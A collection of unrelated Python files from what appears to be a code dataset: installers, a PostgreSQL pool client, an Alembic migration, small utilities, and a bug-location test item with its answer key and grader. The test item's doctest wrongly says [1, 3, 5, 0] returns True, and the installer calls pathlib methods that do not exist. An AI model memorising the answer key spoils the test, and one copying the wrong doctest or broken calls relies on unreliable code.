yaml.dump(values, f)
return 0
print("")
print("--------------------------")
print("| Auto-generated values: |")
print("--------------------------")
print(warning)
print("{}".format(yaml.dump(values, sys.stdout)))
if __name__ == "__main__":
main()
|
def triples_sum_to_zero(l: list):
"""
triples_sum_to_zero takes a list of integers as an input.
it returns True if there are three distinct elements in the list that
sum to zero, and False otherwise.
>>> triples_sum_to_zero([1, 3, 5, 0])
True
>>> triples_sum_to_zero([1, 3, -2, 1])
True
>>> triples_sum_to_zero([1, 2, 3, 7])
False
>>> triples_sum_to_zero([2, 4, -5, 3, 9, 7])
True
>>> triples_sum_to_zero([1])
False
Example solution:
# line 1
for l1 in l:
# line 2
for l2 in l:
# line 3
for l3 in l:
# line 4
if l1 + l2 + l3 == 0 and l1 != l2 and l2 != l3 and l3 != l1:
# line 5
return True
# line 6
return False
"""
# Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4
# END OF CONTEXT
print("4")
# END OF SOLUTION
def check(candidate):
import io
from contextlib import redirect_stdout
f = io.StringIO()
with redirect_stdout(f):
candidate([])
out = f.getvalue().strip('\n')
assert "4" == out
for i in range(0, 10):
if i != 4:
assert str(i) != out
if __name__ == '__main__':
check(triples_sum_to_zero)
|
"""
Install and Uninstall Mongo Connector as a Linux system daemon
"""
import platform
import os
import shutil
import pathlib
import autocommand
import importlib_resources as res
def check_env():
if platform.system() != "Linux":
print("Must be running Linux")
raise SystemExit(1)
if os.geteuid() > 0:
print("Must be root user")
raise SystemExit(2)
log_path = pathlib.Path("/var/log/mongo-connector")
init_script = pathlib.Path("/etc/init.d/mongo-connector")
config_file = pathlib.Path("/etc/mongo-connector.json")
package = "mongo_connector.service"
def install():
log_path.mkdir(exist_ok=True)
init_script.dirname().makedirs_p()
with res.path(package, "config.json") as config_src_path:
shutil.copyfile(config_src_path, config_file)
with res.path(package, "System V init") as init_src_path:
shutil.copyfile(init_src_path, init_script)
def uninstall():
shutil.rmtree(log_path)
config_file.unlink()
init_script.unlink()
@autocommand.autocommand(__name__)
def run(command):
check_env()
globals()[command]()
|
from psycopg2.pool import ThreadedConnectionPool
import psycopg2.extras
import psycopg2.sql as sql
from contextlib import contextmanager
from threading import Semaphore
from ..db.exceptions import DatabaseException
from ..utils.logs import Log
from ..constants import MIN_CONN, MAX_CONN, TIMEOUT_CONN, DEFAULT_OFFSET_LIMIT, DEFAULT_CHUNK_SIZE
from ..asserts import assertz
class SemaphoreThreadedConnectionPool(ThreadedConnectionPool):
def __init__(self, minconn, maxconn, *args, **kwargs):
self._semaphore = Semaphore(maxconn)
super().__init__(minconn, maxconn, *args, **kwargs)
def getconn(self, *args, **kwargs):
self._semaphore.acquire()
return super().getconn(*args, **kwargs)
def putconn(self, *args, **kwargs):
super().putconn(*args, **kwargs)
self._semaphore.release()
class Client:
_instances = {}
__conn = None
def __init__(self, server_conf):
for _server_key in server_conf.keys():
_conf = server_conf[_server_key]
self._instances[_server_key] = {
'server': _server_key,
'conf': _conf
}
self.connect(self._instances[_server_key])
def connect(self, instance):
conf = instance['conf']
_max_conn = int(conf.get('max_conn', MAX_CONN))
_timeout = int(conf.get('timeout', TIMEOUT_CONN))
try:
_conn_pool = SemaphoreThreadedConnectionPool(MIN_CONN, _max_conn, host=conf['host'], port=conf['port'],
dbname=conf['db'], user=conf['user'], password=conf['passwd'],
connect_timeout=_timeout)
instance['conn_pool'] = _conn_pool
Log.trace('>>> Successfully connected to POSTGRES: {}, {}:{}'.format(instance['server'],
conf['host'], conf['port']))
except psycopg2.OperationalError as e:
Log.error('>>PGSQL ERROR {} {}'.format(conf.get('server'), e))
def query(self, server_key=None, sql=None, params=None):
"""
Executes any given sql query
:param sql_query:
:return:
"""
conn = None
try:
if not sql:
raise DatabaseException("Sql cannot be empty")
conn = self.__conn if self.__conn is not None else self._get_conn(
server_key)
cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
schema = self._get_conf(server_key, 'schema')
if schema:
cursor.execute(f"SET search_path TO {schema}")
data = []
chunk_size = params.get('chunk_size') or DEFAULT_CHUNK_SIZE
offset_limit = params.get('offset_limit') or DEFAULT_OFFSET_LIMIT
params.update({
'chunk_size': chunk_size,
'offset_limit': offset_limit
})
try:
while True:
cursor.execute(sql, params)
rowcount = cursor.rowcount
rows = cursor.fetchall()
data.extend(list(map(dict, rows)))
offset_limit += chunk_size
params.update({'offset_limit': offset_limit})
if rowcount != chunk_size or 'limit' not in sql.lower():
break
if self.__conn is None:
# query is not using transaction
self.release_conn(server_key, conn)
return data
except KeyError as e:
Log.error(e)
if conn is not None:
self.release_conn(server_key, conn)
except psycopg2.DatabaseError as e:
Log.error(e)
if conn is not None:
self.release_conn(server_key, conn)
return None
def insert(self, db_table: str, data: dict):
if not self.__conn:
raise DatabaseException(
"Insert must be inside a transaction block")
columns = data.keys()
query = sql.SQL("""insert into {} ({}) values ({})""").format(
sql.Identifier(db_table),
sql.SQL(', ').join(map(sql.Identifier, columns)),
sql.SQL(', ').join(sql.Placeholder() * len(columns)))
conn = self.__conn
cursor = conn.cursor()
cursor.execute(query, list(data.values()))
def _get_conn(self, server_key):
"""
:param server_key: database identifier
:return: raw psycopg2 connector instance
"""
_instance = self._instances[server_key]
assertz('conn_pool' in _instance,
f"getconn failed on {server_key} db", _error_code=0, _status_code=412)
return _instance.get('conn_pool').getconn()
def _get_conf(self, server_key, key):
return self._instances[server_key]['conf'].get(key, None)
def release_conn(self, server_key, conn):
_instance = self._instances[server_key]
_instance['conn_pool'].putconn(conn)
@contextmanager
def transaction(self, server_key):
self.__conn = self._get_conn(server_key)
self.__conn.autocommit = False
try:
yield self
except (psycopg2.DatabaseError, DatabaseException) as e:
Log.error("rollback transaction, {}".format(e))
self.__conn.rollback()
finally:
self.__conn.commit()
self.release_conn(server_key, self.__conn)
self.__conn = None
|
"""Add ModuleBuid.ref_build_context.
Revision ID: caeae7a4f537
Revises: 9ca1c166f426
Create Date: 2018-04-18 13:37:40.365129
"""
# revision identifiers, used by Alembic.
revision = 'caeae7a4f537'
down_revision = '9ca1c166f426'
from alembic import op
import sqlalchemy as sa
# Data migration imports
from module_build_service.common.modulemd import Modulemd
import hashlib
import json
from collections import OrderedDict
modulebuild = sa.Table(
'module_builds',
sa.MetaData(),
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('modulemd', sa.String()),
sa.Column('build_context', sa.String()),
sa.Column('runtime_context', sa.String()),
)
def upgrade():
connection = op.get_bind()
with op.batch_alter_table('module_builds') as b:
b.alter_column('build_context', new_column_name='ref_build_context')
op.add_column('module_builds', sa.Column('build_context', sa.String()))
# Determine what the contexts should be based on the modulemd
for build in connection.execute(modulebuild.select()):
if not build.modulemd:
continue
try:
mmd = Modulemd.ModuleStream.read_string(build.modulemd, True)
mmd = mmd.upgrade(Modulemd.ModuleStreamVersionEnum.TWO)
except Exception:
# If the modulemd isn't parseable then skip this build
continue
mbs_xmd = mmd.get_xmd().get('mbs', {})
# Skip the non-MSE builds, so the "context" will be set default one
# in models.ModuleBuild.
if not mbs_xmd.get("mse"):
continue
# It's possible this module build was built before MBS filled out xmd or before MBS
# filled out the requires in xmd
if 'buildrequires' not in mbs_xmd:
continue
# Get the streams of buildrequires and hash it.
mmd_formatted_buildrequires = {
dep: info['stream'] for dep, info in mbs_xmd["buildrequires"].items()}
property_json = json.dumps(OrderedDict(sorted(mmd_formatted_buildrequires.items())))
context = hashlib.sha1(property_json).hexdigest()
# Update the database now
connection.execute(
modulebuild.update().where(modulebuild.c.id == build.id).values(
build_context=context))
def downgrade():
op.drop_column('module_builds', 'build_context')
with op.batch_alter_table('module_builds') as b:
b.alter_column('ref_build_context', new_column_name='build_context')
|
import json
import time
import sender
while True :
time.sleep(1)
try :
import receiver
break
except OSError :
print("Connect Failed")
continue
except KeyboardInterrupt :
break
import threading
import distributer
sem = threading.Semaphore(5)
config = json.load(open("./config.json", encoding="utf-8"))
#data : raw_msg, msg
#meta : sender/target, type
class disThread(threading.Thread):
def __init__(self, req) :
threading.Thread.__init__(self)
self.msgrequest = req
def run(self) :
with sem :
manager = distributer.Distributer(self.msgrequest)
try :
replydata, replymeta = manager.Distribute()
except :
return None
# DEBUG
print("replydata : ", end = "")
print(replydata)
# print("replymeta : ", end = "")
# print(replymeta)
# DEBUG
talker = sender.Talker((config["IP"], config["send_port"]))
talker.Distribute(replydata, replymeta)
print("Starting...")
while(True) :
time.sleep(0.1)
print("Heartbeat")
req = ""
try :
req = receiver.Receive() # request (dict)
if req == None :
print("NONE")
continue
except KeyboardInterrupt :
print("\nQuitting...")
break
except Exception :
print(Exception)
continue
thisThread = disThread(req)
thisThread.start()
|
import numpy as np
class Tree:
def __init__(self,filename):
self.file = open("{}".format(filename))
self.node_dict = {}
for node in self.file.readlines():
parameter = node.strip().split(",")
if len(parameter) == 4:
self.node_dict[int(parameter[0])] = [parameter[1],parameter[2],[int(x) for x in parameter[3].split("|")],None]
elif len(parameter) == 3:
self.node_dict[int(parameter[0])] = [parameter[1],parameter[2],[],None]
for uid in self.node_dict.keys():
for key in self.node_dict.keys():
if uid in self.node_dict[key][2]:
self.node_dict[uid][3] = key
def node(self,uid,name=None,description=None,children=None):
if uid in self.node_dict.keys():
if name == None:
name = self.node_dict[uid][0]
if description == None:
description = self.node_dict[uid][1]
if children == None:
children = self.node_dict[uid][2]
parent = self.parent(uid)
else:
children = []
parent = None
self.node_dict[uid] = [name,description,children,parent]
def parent(self,uid):
return self.node_dict[uid][3]
def move(self,uid,new_parent):
if self.parent(uid) is not None:
self.node_dict[self.parent(uid)][2].remove(uid)
self.node_dict[new_parent][2].append(uid)
self.node_dict[uid][3] = new_parent
def delete(self,uid):
if uid in self.node_dict[self.parent(uid)][2]:
self.node_dict[self.parent(uid)][2].remove(uid)
for child in self.node_dict[uid][2]:
self.move(child,self.parent(uid))
del self.node_dict[uid]
def close(self,save=None):
self.file.close()
new_lines = []
new_line = ""
if save != None:
save = open("{}".format(save),"w")
for key in self.node_dict.keys():
new_line = "{},{},{}".format(key,self.node_dict[key][0],self.node_dict[key][1])
if self.node_dict[key][2] != []:
new_line += ","
new_line += "|".join(str(x) for x in self.node_dict[key][2])
new_line += "\n"
new_lines.append(new_line)
save.writelines(new_lines)
if __name__ == "__main__":
a = Tree("saves/test.save")
a.node(3,name="new_node",description="a new node")
a.move(3,1)
print(a.node_dict)
a.delete(1)
print(a.node_dict)
a.close(save="saves/other.save") |
import os
import time
import Adafruit_DHT
timestamp = time.strftime("%x") + " " + time.strftime("%X")
# Sensor settings
pin = os.environ['DHT_PIN']
sensor_type = { 'DHT11': Adafruit_DHT.DHT11,
'DHT22': Adafruit_DHT.DHT22,
'AM2302': Adafruit_DHT.AM2302 }
sensor = sensor_type[os.environ['DHT_SENSOR']]
# Try to grab a sensor reading. Use the read_retry method which will retry up
# to 15 times to get a sensor reading (waiting 2 seconds between each retry).
humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
try:
temperature = temperature * 9.0 / 5.0 + 32
except Exception:
temperature = -273.15
humidity = humidity * .01
if humidity is not None and temperature is not None:
print(timestamp, 'Temp=' + str(temperature), 'Humidity=' + str(humidity)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.